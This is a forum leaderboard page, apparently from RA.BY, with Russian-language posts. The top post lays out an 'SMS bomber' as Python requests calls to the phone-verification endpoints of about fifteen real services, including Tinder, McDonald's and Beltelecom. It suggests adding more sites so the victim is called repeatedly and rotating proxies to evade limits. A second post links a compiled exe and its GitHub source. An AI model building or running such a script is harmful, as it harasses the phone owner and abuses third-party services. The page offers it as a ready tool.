Jump to content
RA.BY

Leaderboard

Popular Content

Showing content with the highest reputation on 07/14/2020 in all areas

  1. Для основы можно дернуть источники отсюда, правда не все уже вроде там актуально. + добавить кучу сайтов по записи на курсы, бады, интернет магазины и тд. (Будут по 10-раз звонить ) + Уникализация запросов. (прокси и тд) requests.get('https://findclone.ru/register?phone=+'+phone, params={'phone': '+'+phone}) requests.post('https://app.karusel.ru/api/v1/phone/', data={'phone': phone}, headers={}) requests.post('https://api.sunlight.net/v3/customers/authorization/', data={'phone': phone}) requests.post('https://lk.invitro.ru/lk2/lka/patient/refreshCode', data={'phone': phone}) requests.post('https://online.sbis.ru/reg/service/', json={'jsonrpc':'2.0','protocol':'5','method':'Пользователь.ЗаявкаНаФизика','params':{'phone':phone},'id':'1'}) requests.post('https://myapi.beltelecom.by/api/v1/auth/check-phone?lang=ru', data={'phone': phone}) requests.post('https://lenta.com/api/v1/authentication/requestValidationCode', json={'phone': '+' + phone}) requests.post('https://mcdonalds.ru/api/auth/code', json={'phone': '+' + phone}) requests.post('https://www.citilink.ru/registration/confirm/phone/+'+phone+'/') requests.post('https://rutube.ru/api/accounts/sendpass/phone', data={'phone': '+'+phone}) requests.post('https://drugvokrug.ru/siteActions/processSms.htm', data={'cell': phone}) requests.post('https://www.rabota.ru/remind', data={'credential': phone}) requests.post('https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru', data={'phone_number': phone}, headers={}) requests.post('https://belkacar.ru/get-confirmation-code', data={'phone': phone}, headers={}) requests.post('https://p.grabtaxi.com/api/passenger/v2/profiles/register', data={'phoneNumber': phone,'countryCode': 'ID','name': 'test','email': 'mail@mail.com','deviceToken': '*'}, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'})
    3 points
  2. Небольшая обертка на скрипт выше Сразу в exe: https://github.com/sh-sham/SimpleBomb/raw/master/Bomber-exe.zip C исходниками: https://github.com/sh-sham/SimpleBomb
    1 point
  3. 0 points
  4. Ебала жаба гадюку
    0 points
This leaderboard is set to Minsk/GMT+03:00
×
×
  • Create New...